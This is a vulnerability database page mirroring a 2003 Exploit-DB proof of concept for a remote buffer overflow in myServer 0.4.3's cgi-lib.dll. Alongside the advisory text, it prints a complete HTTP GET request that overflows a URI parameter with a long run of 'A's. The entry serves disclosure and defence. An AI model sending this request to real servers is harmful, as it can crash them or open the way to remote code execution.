myServer 0.4.x - 'cgi-lib.dll' Remote Buffer Overflow (PoC)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1054163 漏洞类型
发布时间 2003-09-12 更新时间 2003-09-12
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23139
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8612/info

myServer has been reported prone to a remote buffer overflow vulnerability. It is possible to trigger this issue by sending overly long values for URI parameters.

Although unconfirmed, this vulnerability may be potentially exploited to execute attacker-supplied code with the privileges of the vulnerable web server.

This vulnerability was reported for myServer version 0.4.3 and earlier. 

GET /cgi-bin/math_sum.mscgi?a=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Moozatech (compatible; Moozatech Scanner)
Host: 12.12.12.12
Connection: Keep-Alive